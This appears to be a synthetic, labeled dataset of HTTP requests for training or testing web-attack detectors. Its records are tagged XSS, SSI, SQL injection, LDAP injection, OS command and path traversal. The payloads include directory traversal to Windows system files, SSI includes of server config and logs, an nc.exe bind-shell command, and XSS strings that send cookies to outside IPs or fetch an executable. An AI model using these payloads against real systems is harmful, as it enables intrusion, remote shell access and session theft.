GET /mJZidv0dR42hzwz/rsedialaargqphnss/yI/ukRLfRUW/a6OiP.PNz0yYdC8j_Ya/ojSometaWandr6yvc/t@WJV-S@Kz0v3jNI8k/tsXyDe3rK8ay6m.png?hSe3tir5iftsoig=201&tb=09287&phpsystemallAloptPmphpPy=jntGmhyoplier&re1Cnj3aefingh=g&eInoan40usser=iyyeo&AOk5Dos=syn%26Kytauuu&pHATSG57autoexechttp=%40&Oa9noatmi5stl=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&PEbHexecAld=c%40nehirta+x&21u=9&av9fIhltEn=l HTTP/1.0
Host: 215.84.106.149
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 0-steehlm, s-a, rorm9-Oafaa;q=0.6, SpevHa4-se2f;q=0.6
Cache-Control: min-fresh=81
Client-ip: 14.151.219.100
Cookie: 1uBUYc7GNpasswd=45;XN7XW9VLgd=suN
Cookie2: $Version="07"
Date: Tue, 26 Jun 07 24:31:57 CET
ETag: "qcIN6.ToaSAjnoWr"
Expect: r9wd
From: erymey@jq6fn.org
If-Modified-Since: Thu, 30 Jun 05 20:25:14 GMT
If-Unmodified-Since: Sun, 18 Feb 07 09:01:23 GMT
If-Match: "G26ugG9CeSPmKJsmF."
If-None-Match: "4FeUjTsqUR9znO0sZ68U"
If-Range: *
Max-Forwards: 189
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: NTLM dGxjcnhpY25lcjNhckRvM2F1dGNsdDhpbWhlbXQyc2hpdGV1ZWU=
Range: 81947-,357703-
Referer: http://www.2nwc.com/o2Si/Iaeb/2iod/s1aZ/rte4.mdb
TE: trailers
Trailer: If-Modified-Since
User-Agent: ao51ri8iO3 (dNwGUOxK)
UA-CPU: StrongARM
UA-Disp: 239,737,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0549x672
Via: FTP/1.9 www.dktki.jpg:0975, sain7/2.3 219.228.23.235, 2.1 www.ethR.htm
Transfer-Encoding: pqirj
Upgrade: mtIo/0.5, wlN/3.9
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 9205115584869
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45880
Start - Id: 47098
class: XSS
GET /hfigoiu9do/itTzuheatf0/eMJUhY/x2tZg-R_pU/ua9udnidfsarh7eiTead/sypSodwUJd@8X1w7yp3.mspx?AfBWunion@1@C.=ao&lmticdqTscast=%3Cstyle+++%3E%3C%21--%3C%2Fstyle%3E%3Cscript++++%3E%5Balert%28%27Iiizngekte%27%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E&hlw=l9rece5ero&c4bnA=uHT HTTP/1.1
Host: 9.200.119.231
Connection: Wsrr
Accept: video/quicktime, video/*, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, identity, gzip
Accept-Language: fn0a-urcSd, pocnxOnb-lA;q=0.0, ie-EeR;q=0.4, cDinD-hBnd0e1t;q=0.4
Cache-Control: no-store
Client-ip: 51.141.13.228
Cookie: ceown1tunpet0o=655500694;me5uyorhpasbloe=srtrxensf6;0rerihi=29;bs9m=5464
Cookie2: $Version="713"
Date: Fri, 21 Dec 07 06:59:37 UTC
ETag: "NVqARtN0JGV.Ro_eNoEv"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Sat, 07 Feb 09 16:10:00 CET
If-Unmodified-Since: Mon, 17 Oct 05 24:23:21 UTC
If-Match: "l1YLv.Y8.ZpyW1XW"
If-None-Match: "Tnw7pnDlBwV9uyUb96h"
If-Range: Sat, 02 Jun 07 19:13:50 CET
Max-Forwards: 5727
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: NTLM RTduRm9hZG90b1NFZWV0bHVzdG5uRWExSXZ0c09wc3F4ZmNldHN2
Range: 74-7756,9-
Referer: /ueic.asmx
TE: chunked;q=0.2,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.5 (X11; U; SunOS sun4u 9.9; qe-mw; rv:2.8.2) Gecko/56787456
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 320x898
Via: FTP/9.8 www.prtgL19.css, 2.8 www.oebwa0.html
Transfer-Encoding: Iirma; yamqatg=dn3n
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47098
Start - Id: 35009
class: SSI
PUT /borsrrrubLAk4rli/dBetqal2Atdm/ewbInohqZ9/io3eme8r/DG_iW.bin? HTTP/1.1
Content-Length: 251
Content-Language: unw,pr,Cjon
Content-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 May 04 03:57:51 CET
Last-Modified: Tue, 11 May 04 05:08:20 GMT
Host: 138.152.192.70:875
Connection: et5sEo
Accept: */*
Accept-Encoding: 
Accept-Language: sh-o0Rcwa;q=0.1
Client-ip: 161.9.74.175
Date: Fri, 18 Feb 05 19:34:13 GMT
ETag: W/"qb@c5jVr@JEq0IYUA7"
If-Match: *
Referer: http://qtdamxt.org/O6Etauqp/tsacnt/segi/sfei.dll
User-Agent: nFiupeXTcirttmf

2fzhJi6Pdrm=0&uTdccrwomb6d3=hhu8/h<qon&ebewatoxsC0l=oddza0&toebz=a-LXJme3@L&0BN@XJx=emBqQst51&rrennmibuuiqmh=<!--#odbc   connect="eooU,hr,Woag7"      statement="select   *    from     r"-->&s7filpkieefur=UeciUva1h oary<

End - Id: 35009
Start - Id: 39855
class: SSI
PUT /tBvFz/uee2alaititeie4cta4/tDvxPwxg/lZYh6/aii/dLyqr4j@d-h/gHFEghf0zqSKb/exY/fepksroectt/oU9C.jpg? HTTP/1.0
Content-Length: 228
Content-Language: n,04aea,n4atn1
Content-Encoding: gzip
Content-Location: /fi6rnlr.msf
Content-MD5: NXNkZjl1ZG01YkxMdHUxbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Mar 09 12:34:16 CET
Last-Modified: Mon, 12 Apr 04 09:00:52 UTC
Host: 200.218.241.20
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.7, x-mac-roman, x-mac-korean;q=0.1
Accept-Encoding: compress;q=0.5, deflate;q=0.2, gzip
Accept-Language: 2th9en-fwi8;q=0.7, aiot1n-a, J-OHnh, vae-mhus;q=0.8
Cache-Control: 7thdkd4='t2s'
Client-ip: 97.213.68.110
Cookie: eeYistnn=<!--     #include virtual="/var/log/httpd/access.log"  -->
Date: Sun, 13 Jun 04 20:32:54 UTC
ETag: W/"VROYI8nGaCnHT3jOGT"
Expect: t0ar3eB
From: tvfxesoi@dneeTei.fr
If-Modified-Since: Thu, 24 Mar 05 19:43:22 GMT
If-Unmodified-Since: Sat, 09 Jan 10 18:54:26 GMT
If-Match: "7pf_Wbv01VMRtgLT"
If-None-Match: "yM0UBhN_lSBQXDXqR7"
If-Range: *
Max-Forwards: 3
Pragma: no-cache
Authorization: Basic QWxhYWs6d3A0ZWVFbw==
Range: 96099-,-13250
Referer: http://www.rl6I.com/eEe3/3heuee.msf
TE: deflate;q=0.5,gzip,chunked
User-Agent: Mozilla/6.6 (X11; U; Linux i386 0.9; it-Oa; rv:4.5.1) Gecko/90499183
UA-CPU: StrongARM
UA-Color: color16
UA-Pixels: 376x9045
Via: 9.4 www.eeiu.htm:67659
Transfer-Encoding: identity
X-Serial-Number: 261049412287034
~~~~~: ~~~~~~~~~~~~~~~~~~

ou=i]mS&mnsfbax=8&m1eoheol=sres&FPgYEmA-G=ss3faVNeform4&ieatmaNde4sl9n=cenxth &Fhofehluhde=047&c7=8gl&4lken08x9hoe=yma&twgmtr=6278028&NhsesNaprostpec=\eO(T\suh9sh/&iRtTA=styleinnw&znhYlti8tewEay=+Irxlbtsnmosl&reue=64

End - Id: 39855
Start - Id: 47503
class: XSS
GET /oASlSTD_3.g68q/riwNqUJi4RZq8arX0/kTvY@7mXcCi/vXoX.shtml?fpymsaiigal=9&Ashutdownr0=o7ltnresoap9&odoA3ud=%3Cdiv+style+%3D+++%22+++++behaviour%3A+++url%28%5Bhttp%3A%2F%2Fwww.etnaonma.com%2Fscript%2Fe0.swf%5D%29%3B+++%22+%3E&trgsUp8le=t&d8ettas=ywb0Gp_bN&NQc@6JXUcE=e4rqnNTihsosugsyi&inputfPSt=cu9pci-lpaouo+s&img=drCw&eldmEEnhcmwx=ievmutemeuwOt&tvek6=EannwssOsisxe&dst4eearrzato=u0BsKgqW2eRB&fhzt=9145093&iGvBUincludevwJmoi=%2FemrtycPas5objectt%3E&yarHwhece8s3w=4204102 HTTP/1.1
Host: www.tjdi0lts.fr
Connection: oksEnr
Accept: */*;q=0.4
Accept-Charset: cp-950;q=0.2
Accept-Encoding: 
Accept-Language: 7vbe-itncr;q=0.8, es2r-Ze, mrh-hielzet, eates-p;q=0.5
Cache-Control: max-stale=42
Client-ip: 121.61.23.210
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="6"
Date: Wed, 16 Aug 06 24:00:16 CET
ETag: W/"mH_4FRfD3DPEqxMbE"
Expect: 100-continue
From: oEh7ee@n2lwamdun.biz
If-Modified-Since: Sun, 30 Jul 06 15:14:33 UTC
If-Unmodified-Since: Wed, 24 Mar 10 10:41:48 GMT
If-Match: "pxzhtupDUMhpB55zD"
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: Wed, 20 Sep 06 13:00:36 GMT
Max-Forwards: 09
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: Basic ZWdycjplaU9lMQ==
Range: 9183-933,-0
Referer: /Asihm/tgtn/onRai/onWruENa.jsp
TE: chunked;q=0.9,trailers,trailers
Trailer: Authorization
User-Agent: dwpKcxC http://www.doEw.it
UA-CPU: x86
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: FTP/3.4 www.sroerS8s.tiff
Transfer-Encoding: deflate
Upgrade: atsa/8.3
Warning: 840 www.salomt.jpg "rNd8aaEbphDe" "Fri, 08 Sep 06 13:06:00 GMT"
X-Forwarded-For: 128.6.45.49
X-Serial-Number: 870651819
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47503
Start - Id: 38698
class: LdapInjection
GET /aYlelzD/tsevtTsuoIetdedmaK.cgi?0s9e=jn+4nte%3B%7Cc7e43&objectx5hrcpt=8&e7bau=ci%29%28++++%7C++%28y306O%3D*%29&pCTT=heerdyEA3pe&tgsc3EnwzTx=22833250&tjpz=6cIO.wGm&acJhWvfhe3tvdEe=3vHst6Rt HTTP/1.0
Host: www.dbneander.com
Connection: eEdgEn
Accept: text/*
Accept-Charset: windows-1250, iso-8859-5, iso-8859-3
Accept-Encoding: deflate;q=0.2, deflate;q=0.3
Accept-Language: Uhnrkr-mTirp4il, a-mhSdulsn, Mui2-v;q=0.8, h-f;q=0.4
Cache-Control: max-stale=6564
Client-ip: 218.181.248.159
Cookie: haosmgdjnun=2Sgeisdrr;sognue=4951583;yScllknitynhe=tirp8rxneeea3bva
Cookie2: $Version="63"
Date: Wed, 19 Mar 08 21:44:43 UTC
ETag: "fO3hMoGbmyhoF4WVadN_"
Expect: ribEgiA=itelO;odita
From: nTromT8u@pzcel.it
If-Modified-Since: Wed, 18 Mar 09 01:57:21 GMT
If-Unmodified-Since: Thu, 13 Aug 09 17:37:05 CET
If-Match: *
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: Sat, 07 Apr 07 14:03:42 GMT
Max-Forwards: 5
MIME-Version: 5.4
Pragma: nathli='r'
Proxy-Authorization: Digest realm
Authorization: Basic aGl1RXJuQTpyYVR0cg==
Range: 32-1,3888-481886
Referer: http://khslr.st/atqiai7/eeLtgf1n/remho.swf
TE: deflate;q=0.3,trailers,trailers
Trailer: Accept-Charset
User-Agent: cNini8esztbre
UA-CPU: PowerPC
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 420x9995
Via: HTTP/3.6 196.109.23.247, FTP/9.6 www.8tt8.jpg:46, HTTP/5.7 151.63.72.63:0
Transfer-Encoding: gzip
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38698
Start - Id: 39713
class: SSI
GET /l7V/vDWdvYWyE/eI@lQ5/eeEie6toq.Lkl/A8p/aymtivaxuriobx/lsFmgmQ69xk-iKraahLN/6mL2bns/_ipiDiframeho/Xlibvn/tO/boot.ini6bQqxwFP-QVwhere.php4?hOinnse=%3C%21--+++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E HTTP/1.0
Host: www.neduh5TO.org:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: fesxh-tbt3i;q=0.2, t25-wner, ot5vs-sxn5sr6e;q=0.1, n9umdcge-fgldoyR, yti6enc-atn
Cache-Control: no-transform
Client-ip: 90.61.188.169
Cookie: d0krgrd1steskn=oN<stte hcdon;1Lnts8g=siaRi
Cookie2: $Version="1"
Date: Sun, 22 Jul 07 08:07:09 GMT
ETag: "eQt1lpFUkKACMULNX9"
Expect: 100-continue
From: n3Pwa2et@Siotzakt2.gov
If-Modified-Since: Mon, 06 Dec 04 11:11:41 GMT
If-Unmodified-Since: Wed, 04 Jun 08 17:53:18 UTC
If-Match: *
If-None-Match: "sxPKoV3rJ.qan7-7SX45"
If-Range: Sun, 29 Jan 06 07:21:27 GMT
Max-Forwards: 249
MIME-Version: 4.8
Pragma: hlh=roo2gtah
Proxy-Authorization: Digest cnonce="d8sec"
Authorization: Basic cm5kcnM6Ymw1Y29y
Range: 61-,98874-5,222224-
Referer: /bhYnbhm/rrylweld/l3ets/dcpyArL.asmx
TE: deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.6 (compatible; MSIE 4.6; WinNT; eunna; 4m0t)
UA-CPU: Sparc
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 066x3039
Via: 5.8 84.224.120.12, FTP/1.1 60.115.141.73
Transfer-Encoding: elvsn; 3fhpaat=nhcom
Upgrade: effn/5.2, ajnt/0.1
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39713
Start - Id: 41758
class: SqlInjection
GET /mtH16Z.FBo/2OzOnrdHa4oed8pmnean/JJp@ObbB.php3?9heainV2e=292480854&qeh=6434&hbpyl=77656944&cn=OR++++791845%3E629036477&rhoen=0737139&rtroteietse=0229&R6a5xYZ9uO8=tiihipzr&7eo0=co&csEvxh=a3rm-n HTTP/1.1
Host: www.raecbL.fr:9716
Connection: close
Accept: image/*, application/*;q=0.0, image/png;q=0.0
Accept-Charset: iso-8859-4;q=0.5, iso-8859-5;q=0.2, windows-1250;q=0.4, iso-8859-6
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 122.67.58.101
Cookie: Uithl=obeyw;bi=6309;rh=oyar;d6S=Qa-xiaiic;8JOfY38TqB=irhedan7tersreheSe
Cookie2: $Version="416"
Date: Sun, 09 Mar 08 19:45:55 GMT
ETag: "xdRpcd80difxy7zp-Wn"
Expect: osevnd
From: lehFo@eioiwni.cz
If-Modified-Since: Sat, 05 Sep 09 17:18:31 GMT
If-Unmodified-Since: Mon, 24 Jul 06 04:52:30 UTC
If-Match: "gDP@ZAnsleJxq6xth8"
If-None-Match: *
If-Range: Sun, 17 Apr 05 20:31:27 CET
Max-Forwards: 421
MIME-Version: 3.9
Pragma: n='rsnbi'
Proxy-Authorization: Basic c0F0b3k6ZW4wbm9vdG0=
Authorization: Basic ZWFxYXRzczpibnJ6bGVvbw==
Range: 4234-490888,-164882
Referer: http://ewaYaoen.gov/clgi/ljtjem/7apwneap.sh
TE: gzip;q=0.9
Trailer: Cache-Control
User-Agent: qeolaseH/9.3
UA-CPU: 68000
UA-Disp: 9710,8359,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9206x518
Via: 1.9 65.212.198.44:49484, FTP/9.6 204.103.111.215, 0.8 45.66.246.243
Transfer-Encoding: deflate
Upgrade: 0rei4d/2.0, titan/4.1, nsj/8.7, ngq/4.4
Warning: 486 www.rgnso.shtml:1 "waivD4wgcsuaoDeedtp" "Fri, 12 Feb 10 10:10:14 GMT"
X-Forwarded-For: 140.12.238.50
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41758
Start - Id: 42867
class: OsCommanding
GET /Iibbyoe7xt/eiwlViI_UPru0WfwNui/fine/7bK@8_pJ.liP/0prhoD4D.aspx?ruoAJ=%7C++++shell%28++++%22cmd+++++%2Fc++c%3AInetpubwwwrootMSISSnc.exe+-l+++++-p+0619++++-t++-e++cmd.exe+++++%22++++%29+%7C%27&gee7teuwtn=969479419&qaQx_sSo-document=6%7C-+&ignne=trY9oraieana&sy=019&iinC54Ok=t+rdocument&opx7osEieIdh=0954&C2passwdwinnt6QWd=brcpg&0.E6mfVTj=%40c&1yep5k-a=SVtpassthrupaeNhe%2F1rli&EssrEhci=45401&ety=749&_zVFGgZ=%2Fte&rp=eygIQoJUnJn8 HTTP/1.0
Host: www.ohseEOosot.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: al-k, Epsopt-maiiarsr, is-ai, a-2m6e;q=0.8, rue-unat
Cache-Control: no-transform
Client-ip: 4.100.41.101
Cookie: sftt=ene
Cookie2: $Version="28"
Date: Sat, 08 Aug 09 18:41:02 CET
ETag: W/"DFX@tZVgvg@-RMrr"
Expect: 100-continue
From: seEq2z@qtlvmnTeI.be
If-Modified-Since: Sat, 18 Nov 06 16:07:26 GMT
If-Unmodified-Since: Fri, 31 Dec 04 16:34:30 GMT
If-Match: "h@lY-hNGBxDnlKEd2KF"
If-None-Match: "itbkoKekDZKviwV"
If-Range: Fri, 12 Jun 09 01:20:52 UTC
Max-Forwards: 089
MIME-Version: 9.4
Pragma: aat=av3ee
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: Basic djZpOGk6YW5jaGQ1aWU=
Range: -64,-955
Referer: /gte0smye/Easimh/mmsunrb/edaiet.png
TE: deflate;q=0.8,trailers
Trailer: Via
User-Agent: aWoeoSm http://www.raooke.ch
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.8 3.36.6.54, HTTP/5.7 159.70.36.254
Transfer-Encoding: ehna; 9x6nd=eghuec
Upgrade: gveGs/4.5, yshrh/3.9, mYo/3.1
Warning: 323 162.27.151.212 "63fpil54l" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42867
Start - Id: 45477
class: PathTransversal
GET /d86-e7JvS/4.E4JFu.js?1de=ue5hnhoshrprocessing-instructiono-s6r8&Sbz2lhoR=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&pieln8t=losgs HTTP/1.1
Host: 7.75.117.220:38712
Connection: 3eetd
Accept: video/*;q=0.0, image/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iene8-rr, a0rdshs-evh
Cache-Control: no-store
Client-ip: 172.157.36.227
Cookie: xnetFoshh=ep;nnsQfakiNw=1EFa5RLa;yuob=access_logeH4r
Cookie2: $Version="01"
Date: Sun, 30 Nov 08 16:08:36 GMT
ETag: "u_g0XiWobOrZHoGp"
Expect: 100-continue
From: 9lho@aiRe.net
If-Modified-Since: Sun, 31 Dec 06 20:05:24 GMT
If-Unmodified-Since: Thu, 16 Sep 04 12:26:43 GMT
If-Match: "IF0MoCAR@dw@D2VDn92"
If-None-Match: "f1FQh7EwzZnLTMGpX8"
If-Range: Fri, 13 Oct 06 02:36:22 CET
Max-Forwards: 688
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="hesa"
Authorization: 6h7bea eosiQo=t7egN
Range: -48787
Referer: /wqQpal/sMhxt/hrcrrai/eestootl.php4
TE: trailers,trailers,deflate;q=0.8
Trailer: Referer
User-Agent: ztr2ayokk/9.4.0
UA-CPU: x86
UA-Disp: 3626,740,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5163x468
Via: FTP/2.9 223.210.147.184, FTP/5.7 www.dgESoui.png, 7.6 www.bo3t0es.jpg
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45477
Start - Id: 45710
class: PathTransversal
GET /tLalluDZSd@/bin6BZfhttpsEs9s.swf?fete1nj6=k%3A%5C%5CWINNT%5C%5Cwin.ini HTTP/1.1
Host: www.totev.cz:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: cp-932;q=0.7, windows-1258, iso-8859-8-i
Accept-Encoding: identity, compress, gzip, identity
Accept-Language: ON-Ad0eSr, hs-ifnnsCuu, rn-fnE;q=0.7, lS-8rhoano
Cache-Control: only-if-cached
Client-ip: 246.116.135.101
Cookie: 9d=u6GUD705
Cookie2: $Version="941"
Date: Mon, 01 Oct 07 01:14:46 CET
ETag: "W2cyccIkLZi2-vmxGbfE"
Expect: 100-continue
From: rr0Mnd@noe2etf84f.gov
If-Modified-Since: Mon, 04 Sep 06 01:04:43 UTC
If-Unmodified-Since: Sun, 29 Nov 09 08:51:36 GMT
If-Match: "5KKzSHX6gMIYLC7eeueg"
If-None-Match: "uCmYFFYx004KMs_I-TE"
If-Range: Sat, 19 May 07 22:51:51 UTC
Max-Forwards: 1
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic b3VyZ2NvZTppaHNy
Range: 8441-
Referer: http://o2lhgee.gov/riatef/Shh3n.swf
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.9 (compatible; MSIE 8.7; WinNT; suerime; gom8t)
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 967x7308
Via: HTTP/8.6 www.rr8w.css, 0.1 186.99.51.155
Transfer-Encoding: 0tlo
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 140.86.158.94
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45710
Start - Id: 46824
class: XSS
PUT /sNt7sotsbehrgwaiiAso/a3L/lB3a2Ib846/jsaehvjng0oa0readoy/E@/7iaaosjiEees8/ESq8sYfadminMb/e3ln3ds7eZas/iasosyoex/liuct25.mspx? HTTP/1.0
Content-Length: 138
Content-Language: jehWLd,yIlchiL,asn
Content-Encoding: compress
Content-Location: http://www.28oessyg.ch/8y5sie/rnmn/fnrolsI/fsadei.txt
Content-MD5: TG9oYnVlZWNFcm1lcmJFNA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Apr 09 15:36:40 UTC
Last-Modified: Sat, 15 Dec 07 21:22:41 UTC
Host: 223.197.156.167:80
Connection: s4Ermt
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 20.57.50.84
Cookie: en0nsnztva=dwu2eqs77r;after7xcct2sBs=13704;cpthQiitsuot61s=nc@httpshm;egaidReiadeaweb=b'n%un;1aZWsservices9=7413
Cookie2: $Version="9"
Date: Sun, 24 May 09 22:46:41 GMT
ETag: W/"CE44HJExLHf9qTC"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Sun, 04 Jan 09 23:33:17 GMT
If-Unmodified-Since: Sun, 11 Dec 05 01:58:38 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 06 Aug 07 18:58:30 GMT
Max-Forwards: 6250
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: Basic bnRlZTpyNm9v
Range: 04-141477,-19
Referer: /soNufehj/scinb/Osac.png
TE: chunked;q=0.6
Trailer: If-None-Match
User-Agent: oLd6i2/2.5.4
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 3.1 26.106.2.244, 4.5 www.h3zycsns.html, 7.9 www.nyial4m.html
Transfer-Encoding: identity
Upgrade: dmhn/6.6, j0orh/4.6
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dae=<img   src =  "javascript: [window.open('http://200.36.167.18/ictrma.php'+document.cookie);]    ">

End - Id: 46824
Start - Id: 47225
class: XSS
GET /3aLvpnLca9GfzuKJ4b6.php4?nwr5j=6573&lhasr0Jtnees=%3Cimg++src%3D++%22++++livescript%3A%5Bwindow.open%28%27http%3A%2F%2F60.213.98.140%2Fmaesst.exe%27%2Bdocument.cookie%29%3B%5D+++%22%3E&erGrEqx=603947&Wi2itnxsfakrce=5&lb6kidatie=y%28evalse&rjBBajprocessing-instructionxp_boot.inihtaccesu=SRitPpebEwTcL&kt4omsm=754305&enbtsoes=06019&lm=058557540&S3s=ea%2F HTTP/1.1
Host: 65.77.226.218
Connection: close
Accept: audio/*;q=0.8
Accept-Charset: windows-1253;q=0.5, shift_jis;q=0.1, iso-8859-15, gb2312, iso-8859-4
Accept-Encoding: 
Accept-Language: dniro-l9EpUrm;q=0.4, nogs-efn3;q=0.3, dSudi-rg, hStdLa-9Dsm4h
Cache-Control: only-if-cached
Client-ip: 179.225.149.173
Cookie: fliirtqasnayhsa=iwgett;priod=74029900
Cookie2: $Version="97"
Date: Thu, 23 Apr 09 05:55:37 UTC
ETag: "1GrtRjyzVjvgoMOl2e"
Expect: 100-continue
From: nsseehjh@a5ejeaendE.biz
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Wed, 27 Apr 05 07:36:30 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 16 Apr 06 21:26:05 CET
Max-Forwards: 8
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest username="pwrd"
Range: 7379-
Referer: /n5iIa/tdrwpais.nsf
TE: gzip;q=0.1,trailers,gzip;q=0.4
Trailer: TE
User-Agent: d3nLyA
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 286x017
Via: HTTP/0.9 64.164.241.183, 7.6 112.188.23.232:86
Transfer-Encoding: gzip
Upgrade: rako/1.9, sgo/1.5, 5edi/5.4, t0a/2.0
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 16.107.252.123
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47225
Start - Id: 44071
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.0
Host: 153.114.241.147:90
Connection: keep-alive
Accept: text/*;q=0.0, audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 103.148.81.42
Cookie: yroebaofl57s=r;access_log8Ktmpz8ELdA=]s A'6;e7iessel=8yye.yvjR36T;bU.mpga5=445662;8z=9e4e;h0zem8t4=td01
Cookie2: $Version="1"
Date: Tue, 29 Jul 08 13:03:35 CET
ETag: W/"8jJSMp1FL9CwR-.L4"
Expect: 100-continue
From: eyde@enOee.biz
If-Modified-Since: Thu, 01 Dec 05 02:58:49 UTC
If-Unmodified-Since: Sat, 23 Jun 07 03:48:37 UTC
If-Match: *
If-None-Match: *
If-Range: "C1H9fyXqPdeZ7PAV4MsR"
Max-Forwards: 99
MIME-Version: 9.0
Pragma: g=e
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: bIaa veahoau=hRen
Range: -6,-7
Referer: /durtt/hlrha/dLeCcd/amKoEea.cfm
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: ioPna3/1.3.9.6
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 0.1 www.dhnid.htm
Transfer-Encoding: deflate
